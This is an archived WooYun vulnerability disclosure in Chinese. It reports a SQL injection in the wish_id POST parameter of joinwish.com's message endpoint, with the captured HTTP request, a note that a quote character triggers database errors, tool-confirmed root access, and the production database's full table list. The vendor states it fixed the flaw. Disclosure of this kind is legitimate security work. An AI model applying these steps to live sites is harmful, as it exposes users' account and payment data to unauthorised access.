当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034608

漏洞标题:好愿网主站post注入漏洞一枚

相关厂商:joinwish.com

漏洞作者: 带馅儿馒头

提交时间:2013-08-19 18:14

修复时间:2013-10-03 18:15

公开时间:2013-10-03 18:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-08-19: 细节已通知厂商并且等待厂商处理中
2013-08-20: 厂商已经确认,细节仅向厂商公开
2013-08-30: 细节向核心白帽子及相关领域专家公开
2013-09-09: 细节向普通白帽子公开
2013-09-19: 细节向实习白帽子公开
2013-10-03: 细节向公众公开

简要描述:

看见你们发礼物了,来求个礼物!

详细说明:

1.登录后对某个用户的愿望点击祝福;

5.png


2.填写任意祝福内容,点击提交并抓包;

1.png


3.此时抓包会抓到2个post请求数据,第一个忽略掉,我们来看第二个抓到的请求数据;

POST /wishservice/add_wish_msg HTTP/1.1
Host: www.joinwish.com
User-Agent: 
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://www.joinwish.com/wish/show/id/1432
Content-Length: 24
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
wish_id=1432&content=123


4.这里发现在wish_id参数后加上一个',系统返回了数据库的错误信息,当然还有网站的绝对路径信息,但是这些信息我们在网页上是还不见的;

6.png


5.直接使用工具跑下,得到如下信息;
root权限:

3.png


数据库信息:

4.png


表信息:

Database: joinwish_product
[132 tables]
+------------------------------+
| account_freeze_tx            |
| account_topups               |
| account_transfers            |
| account_tx                   |
| account_withdraws            |
| accounts                     |
| alipay_transfer              |
| alipay_transfer_batch        |
| areas                        |
| auth_group                   |
| auth_group_permissions       |
| auth_permission              |
| auth_user                    |
| auth_user_groups             |
| auth_user_user_permissions   |
| backend_tx                   |
| backends                     |
| bank_cities                  |
| bank_provinces               |
| barcode_types                |
| biz_card_bindings            |
| brands                       |
| c2c_topup_requests           |
| card_items                   |
| cities                       |
| cs_logs                      |
| cs_roles                     |
| cs_user_functions            |
| cs_user_role_functions       |
| cs_user_roles                |
| cs_users                     |
| django_admin_log             |
| django_content_type          |
| django_session               |
| django_site                  |
| errors                       |
| exchanges_users              |
| favorite_wishes              |
| gateway_audit                |
| gateway_audit_result         |
| gateway_order                |
| give_user_brand              |
| hulu_card_no_libs            |
| invitees                     |
| merchants                    |
| mptopup_orders               |
| offline_transfers            |
| p2p_catalogs                 |
| p2p_comment                  |
| p2p_commodities              |
| p2p_exchange_0               |
| p2p_exchange_1               |
| p2p_merchant                 |
| p2p_order                    |
| p2p_send_transaction         |
| p2p_send_withdraw            |
| p2p_settlement_payment_batch |
| p2p_ticket                   |
| p2p_ticket_batch             |
| payment_card_logs            |
| payment_channels             |
| payment_orders               |
| properties                   |
| provinces                    |
| public_utility_orders        |
| refunded_transactions        |
| settlement                   |
| settlement_detail            |
| shopping_items               |
| shopping_orders              |
| terminal_requests            |
| transaction_details          |
| transactions                 |
| tx_types                     |
| user_addresses               |
| user_backends                |
| user_friends                 |
| user_mp_verify_codes         |
| user_reg_requests            |
| user_saved_cards             |
| user_sessions                |
| user_uploaded_pic_catalogs   |
| user_uploaded_pics           |
| user_wish_statistics         |
| users                        |
| weibo_template               |
| wish_albums                  |
| wish_amount_increase_logs    |
| wish_award_logs              |
| wish_base                    |
| wish_cash_coupons            |
| wish_comments                |
| wish_commodities             |
| wish_cs_roles                |
| wish_cs_user_functions       |
| wish_cs_user_role_functions  |
| wish_cs_user_roles           |
| wish_cs_users                |
| wish_details                 |
| wish_exchange_items          |
| wish_exchange_tocheck_users  |
| wish_exchange_view           |
| wish_exchanges               |
| wish_fans                    |
| wish_gifts                   |
| wish_give_logs               |
| wish_give_tx                 |
| wish_guest_infos             |
| wish_hp_use_logs             |
| wish_join_requests           |
| wish_members                 |
| wish_mer_exchange            |
| wish_merchants               |
| wish_msgs                    |
| wish_pdts                    |
| wish_praise_statistical      |
| wish_prop_logs               |
| wish_pub_logs                |
| wish_solutions               |
| wish_themes                  |
| wish_transfers               |
| wish_user_banding            |
| wish_user_guides             |
| wish_user_notification       |
| wish_user_verification       |
| wish_users                   |
| wish_visit_logs              |
| wishes                       |
| withdraw_fee_rate            |
| ym_sms                       |
| ym_sms_mo                    |
| ym_sms_mt                    |
+------------------------------+


5.测试到这里就差不多了,求礼物!!!

漏洞证明:

见详细说明

修复方案:

过滤

版权声明:转载请注明来源 带馅儿馒头@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-20 10:13

厂商回复:

该漏洞已与昨日修复

最新状态:

暂无

漏洞评价:

评论